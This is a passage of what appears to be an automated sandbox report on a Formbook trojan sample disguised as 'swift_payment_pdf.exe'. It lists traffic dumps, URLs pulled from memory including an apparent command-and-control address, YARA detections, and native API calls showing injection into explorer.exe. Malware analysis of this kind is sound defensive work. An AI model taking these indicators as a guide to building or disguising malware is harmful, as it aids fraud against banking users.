72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:07 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 
72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:12 GMT
                Connection: close
                Content-Length: 1611
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:28 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:31 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:47 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=59sfsk5vb61o8dvihsk4a1tq01; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:52 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=rttvo4em4t1k4snuk62mngh6c6; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:55 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=ocojme6j9q0ajf5vusma8tpnm2; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
            Source: explorer.exe, 00000007.00000002.3556356066.0000000005E6A000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002F4A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://soft.365jz.com/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915539193.00000000058A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com0
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: AbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.wwfglobal.com
            Source: AbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.wwfglobal.com/awho/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033gPR
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003218000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: explorer.exe, 00000007.00000003.2427925952.0000000007FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: explorer.exe, 00000007.00000002.3556356066.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002A94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2537070177.000000000CC84000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vR

            E-Banking Fraud

            Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: initial sampleStatic PE information: Filename: swift_payment_pdf.exe
            Source: initial sampleStatic PE information: Filename: swift_payment_pdf.exe
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0042B4F3 NtClose
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392B60 NtClose,LdrInitializeThunk
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013935C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01394340 NtSetContextThread
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01394650 NtSuspendThread
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392BA0 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392B80 NtQueryInformationFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392BF0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392BE0 NtQueryValueKey
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392AB0 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392AF0 NtWriteFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392AD0 NtReadFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392D30 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392D10 NtMapViewOfSection
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392D00 NtSetInformationFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392DB0 NtEnumerateKey
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392DD0 NtDelayExecution
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392C00 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392C60 NtCreateKey
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392CA0 NtQueryInformationToken
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392CF0 NtOpenProcess
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392CC0 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392F30 NtCreateSection
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392F60 NtCreateProcessEx
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392FB0 NtResumeThread
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392FA0 NtQuerySection
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392F90 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392FE0 NtCreateFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392E30 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392EA0 NtAdjustPrivilegesToken
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392E80 NtReadVirtualMemory
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01392EE0 NtQueueApcThread
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01393010 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01393090 NtSetValueKey
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013939B0 NtGetContextThread
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01393D10 NtOpenProcessToken
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01393D70 NtOpenThread
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05014650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05014340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050135C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050139B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012C00 NtQueryInformationProcess
